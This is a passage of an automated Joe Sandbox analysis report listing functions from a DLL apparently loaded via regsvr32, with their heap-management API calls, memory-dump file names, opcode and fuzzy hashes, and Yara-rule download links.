Instruction ID: 638d8a9d72e7e087aacd408299a7e0f859bedf0d5cf8e844e23e6b4c23a30a1a
Opcode Fuzzy Hash: 8fde4531e1a884be5a99b2484af7e0bfdec3953cf9859f7fb4137282dbee6db8
Instruction Fuzzy Hash: 44313C2190EEC2A0E660EF52D4143FAA2B1EFC87C4F446071DA4DC6AAACF7EE4449640

Function 00007FF8A93080F5 Relevance: 10.1, APIs: 8, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93084E1
HeapFree.KERNEL32 ref: 00007FF8A93084FC
HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 991fef08b79171be20da31557d9542be86fb3f45f7645c607263057c754fd2d0
Instruction ID: bdb9cb1b8a6e910ce284deeaf082d00e27fb56e2cd24e6fe9c8083e590372b99
Opcode Fuzzy Hash: 991fef08b79171be20da31557d9542be86fb3f45f7645c607263057c754fd2d0
Instruction Fuzzy Hash: 3D310C2190EEC2A0F624EF52A4583FA62B1FFC87C4F446076D54ECA69ACF7EE444D601

Function 00007FF8A9307FBC Relevance: 10.1, APIs: 8, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93084E1
HeapFree.KERNEL32 ref: 00007FF8A93084FC
HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b9ac4d9512c90be7035979054ac21f1ec4db44d632d5d3d7e0ef561a44a9ddcb
Instruction ID: 016f5f20d285bba0a8329b45b1a1acc2676537849ffda0621296915842744381
Opcode Fuzzy Hash: b9ac4d9512c90be7035979054ac21f1ec4db44d632d5d3d7e0ef561a44a9ddcb
Instruction Fuzzy Hash: 66310C2190EEC2A0F664EF52A4583FA6271FFC87C4F446076D54ECA69ACF7EE044D601

Function 00007FF8A93084BD Relevance: 10.1, APIs: 8, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93084E1
HeapFree.KERNEL32 ref: 00007FF8A93084FC
HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 96c39fe0d3da3040bbbf1f122159ae1dab2f3696ab783d8f852be5ea89b4b417
Instruction ID: c8539c615e4bf8cc4dd76a1ce5abc74ef8c803674f6ecb8f0f91862ee5352742
Opcode Fuzzy Hash: 96c39fe0d3da3040bbbf1f122159ae1dab2f3696ab783d8f852be5ea89b4b417
Instruction Fuzzy Hash: CC310C2190EEC2A0F624EF52A4583FA62B1EFC87C4F446076D54DCA69ACF7EE044D601

Function 00007FF8A93486E0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93486FA
HeapFree.KERNEL32 ref: 00007FF8A93487DB
HeapFree.KERNEL32 ref: 00007FF8A9348898

Strings

main, xrefs: 00007FF8A934875D
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF8A93488FE, 00007FF8A9348994

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$main
API String ID: 3298025750-3821718884
Opcode ID: 04311f8484996615b80cbe3c8043f456cd4d4e0b65da824b74bd4273dcdf5596
Instruction ID: 775e191d7dd28d457e728ec83f4866072342a79f35c28716fddfdb8ccc279d72
Opcode Fuzzy Hash: 04311f8484996615b80cbe3c8043f456cd4d4e0b65da824b74bd4273dcdf5596
Instruction Fuzzy Hash: A9918B22A0EE82A4EB11DF51E8443B927B1FF847C4F46A436DA6D8A795DF7CE485C300

Function 00007FF8A93493F9 Relevance: 9.1, APIs: 6, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9349413
HeapFree.KERNEL32 ref: 00007FF8A934943C
HeapFree.KERNEL32 ref: 00007FF8A934946F
SetLastError.KERNEL32 ref: 00007FF8A934957A
GetFullPathNameW.KERNEL32 ref: 00007FF8A934958F
GetLastError.KERNEL32 ref: 00007FF8A934959A
GetLastError.KERNEL32 ref: 00007FF8A93495B3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast$FullNamePath
String ID:
API String ID: 2157454263-0
Opcode ID: 3c0c321286fb6f3b9183d93ec9de582e75c11f518bf410b982b40cf503dccaae
Instruction ID: ce8150d938864bafe65ed095665081cceb23fc49054d7fdbb9ecac4fa0e68ac4
Opcode Fuzzy Hash: 3c0c321286fb6f3b9183d93ec9de582e75c11f518bf410b982b40cf503dccaae
Instruction Fuzzy Hash: 6641A421A0EFC199E7359E61D8443FA22A4FB45BD8F116135ED0EDB7C5CE78A2008340

Function 00007FF8A934941A Relevance: 9.1, APIs: 6, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A934943C
HeapFree.KERNEL32 ref: 00007FF8A934946F
SetLastError.KERNEL32 ref: 00007FF8A934957A
GetFullPathNameW.KERNEL32 ref: 00007FF8A934958F
GetLastError.KERNEL32 ref: 00007FF8A934959A
GetLastError.KERNEL32 ref: 00007FF8A93495B3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorLast$FreeHeap$FullNamePath
String ID:
API String ID: 554372815-0
Opcode ID: 21ae2b1687339e705adfc1e3d21b3004eb0ec5ef78f40e7b44a01ecb5652b0c9
Instruction ID: c1be1813442abdaab715267ec72f958f067f57a3ed06ca32ac1d9b27df71d995
Opcode Fuzzy Hash: 21ae2b1687339e705adfc1e3d21b3004eb0ec5ef78f40e7b44a01ecb5652b0c9
Instruction Fuzzy Hash: 31419221A0EFC1A9EB349F61D8447FA22A4FB49BD8F156135ED0EDB7C5CE79A2408300

Function 00007FF8A932BD4D Relevance: 8.9, APIs: 7, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 0a2e9717b38cb5d355d1e6921ad268509b2445d4824dd16427ce2c94b82a2909
Instruction ID: 918ff06cd1f926f067e23b64bc151500d83feecc04d0bea5dc2ee48e80e637b4
Opcode Fuzzy Hash: 0a2e9717b38cb5d355d1e6921ad268509b2445d4824dd16427ce2c94b82a2909
Instruction Fuzzy Hash: 04612732A0EEC2A8E7208F21C8543F937B1FB597C8F44A176DA0D9BA88CF399544D341

Function 00007FF8A932A9DE Relevance: 8.9, APIs: 7, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932A9ED

Part of subcall function 00007FF8A9332040: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A932A9FD), ref: 00007FF8A9332089
Part of subcall function 00007FF8A9332040: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A932A9FD), ref: 00007FF8A93320A1

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

Part of subcall function 00007FF8A9331F90: HeapFree.KERNEL32 ref: 00007FF8A9331FE9
Part of subcall function 00007FF8A9331F90: HeapFree.KERNEL32 ref: 00007FF8A9332001

HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CaptureContextExceptionRaiseUnwindabortmemcpy
String ID:
API String ID: 2542667021-0
Opcode ID: 5952c18b990f1a2a4cb8aa07eb30946ffe44166a3c7b8edb7c525af4b514637a
Instruction ID: cb60b6feee94ae5625b43f11fab5a3b4e6621dd15fac5fbe18ee585f993480eb
Opcode Fuzzy Hash: 5952c18b990f1a2a4cb8aa07eb30946ffe44166a3c7b8edb7c525af4b514637a
Instruction Fuzzy Hash: C9515E2290EEC1A9F725AF2999453F923B0FF987C8F04A131DE4D87796DF399295C200

Function 00007FF8A932BD05 Relevance: 8.9, APIs: 7, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 7699bacceda0390f1bd0ad6422dc3d5ca448318567c24b25e5c4dfbc304e5ba9
Instruction ID: fa1cb5db75ca682178d086c179e0b28319edb51408e7feb5cf7513ab573c662e
Opcode Fuzzy Hash: 7699bacceda0390f1bd0ad6422dc3d5ca448318567c24b25e5c4dfbc304e5ba9
Instruction Fuzzy Hash: F2510922A0EEC2A8E7248F21C4543F937B1FB597C8F44A076DA4D9BA99CF39D544D341

Function 00007FF8A932BD1D Relevance: 8.9, APIs: 7, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 0986f8ff8569904e820052a9b019fedcb6a2ef9f230d48407f13f28fcbab3a4b
Instruction ID: 09b3b25fd7f7efba3fadf761f50bdb2fe8b77a9a80e7116b04f3fa1bf67fa399
Opcode Fuzzy Hash: 0986f8ff8569904e820052a9b019fedcb6a2ef9f230d48407f13f28fcbab3a4b
Instruction Fuzzy Hash: 6151F922A0EEC1A8E7248F21C8543F937B1FB597C8F44A076DA4D9BA99CF39D544D341

Function 00007FF8A932BD35 Relevance: 8.9, APIs: 7, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932C8F9
memcpy.MSVCRT ref: 00007FF8A932CAEE
HeapFree.KERNEL32 ref: 00007FF8A932CAFF
HeapFree.KERNEL32 ref: 00007FF8A932D27D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 63eb14e19864e14ee652e24618796cf0724cb086f3b1e8ff28a84bdd8e437c55
Instruction ID: 77e7e089073796c41693e651066187d30eb2b6d5fb2d3d5fa1927710dd18ce25
Opcode Fuzzy Hash: 63eb14e19864e14ee652e24618796cf0724cb086f3b1e8ff28a84bdd8e437c55
Instruction Fuzzy Hash: DA51F922A0EEC1A8E7248F21C8543F937B1FB597C8F44A076DA4D9BA99CF39D544D341

Function 00007FF8A932B9DB Relevance: 8.9, APIs: 7, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32 ref: 00007FF8A932C636
HeapFree.KERNEL32 ref: 00007FF8A932C826
HeapFree.KERNEL32 ref: 00007FF8A932C83F
HeapFree.KERNEL32 ref: 00007FF8A932C858
HeapFree.KERNEL32 ref: 00007FF8A932C877
HeapFree.KERNEL32 ref: 00007FF8A932C896
HeapFree.KERNEL32 ref: 00007FF8A932C8DC
HeapFree.KERNEL32 ref: 00007FF8A932D27D
HeapFree.KERNEL32 ref: 00007FF8A932D7C3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID:
API String ID: 3901518246-0
Opcode ID: 5ed5701488604db9c764ec4b2a7e1951054d949c4a2a21d63e9780aac099d0b4
Instruction ID: 1b853d50805bb7bf398394ccb2c0ff090a6d9c88ba6228c5bc4b7af0bef15eb0
Opcode Fuzzy Hash: 5ed5701488604db9c764ec4b2a7e1951054d949c4a2a21d63e9780aac099d0b4
Instruction Fuzzy Hash: B4511832A0EFC1A8F7648F21C8443F937B0EB597C8F04A076CA4D9A699CF79A585D341

Function 00007FF8A932A9A8 Relevance: 8.9, APIs: 7, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AA46
HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 2e9a52ca18bec02b22c481d5ca1bd2ddd153f91ff1a5b4f20d3e47ea1b827125
Instruction ID: 16da5ec56a468d5ff71be7013eda33ed118d23faed5b9c8f105e0fc19c9b97bc
